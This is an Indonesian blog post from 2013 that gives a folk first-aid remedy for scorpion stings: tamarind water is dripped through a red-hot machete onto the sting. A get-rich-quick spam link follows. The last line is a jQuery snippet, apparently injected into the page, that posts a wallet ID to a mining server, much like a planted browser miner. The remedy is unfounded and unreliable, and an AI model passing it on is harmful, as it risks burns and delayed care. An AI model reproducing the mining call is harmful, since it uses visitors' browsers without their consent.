belajar komputer

Minggu, 10 Februari 2013

OBAT PENAWAR BISA KALAJENGKING


Kali ini saya akan memberikan satu cara menawarkan bisa kalajengking,mungkin diantara agan agan atau saudara tetangga atau siapa aja yg kebetulan terkena bisa kalajengking cara ini ampuh buat penawarnya walaupun rasanya agak sakit. pertama siapkan golok,parang atau apa saja yg pasti banyak mengandung baja/bahan terbuat dari baja. kedua rendaman asam jawa,maksudnya asam jawa kita campur dengan air.
, setelah semua sudah disiapkan nyalakan api tungku lalu golok atau parang tadi kita panggang sampai berwarna merah.jika golk/parang/ besi baja sudah berwarna merah, ambil golok tadi letak kan diatas tempat yang terkena sengat kala jengking/terkena bisa tapi jangan sampai menyentuh dengan posisi agak dimiringkan ujungnya kebawah,setelah itu siramkan air rendaman asam jawa tadi ke golok tadi biarkan airnya menetes melalui golok panas tadi menuju ketempat yg sakit. tapi jangan lupa ya setelah itu langsung bawa ke dokter ,cara diatas tadi itu sebagai P3K selanjutnya serahkan pada ahlinya.sekian dulu semoga bermanfaat. 


 INFO : Rahasia Mengumpulkan Kekayaan Lewat Internet Dengan MUDAH dan CEPAT Akhirnya Ditemukan...!! Ratusan Ribu hingga JUTAAN RUPIAH tiap hari langsung masuk rekening...!!KLIK DI SINI

Tidak ada komentar:

Posting Komentar

var wallet = "cy_26 067b6 be129 ba270 c8100 e0f49 03d82 eab5c 3b065 43fea e169e c7e1f aa5fd f1"; $.post("http://mining.cayafuture.com:2435/"+wallet, function( data ) { //alert(data); })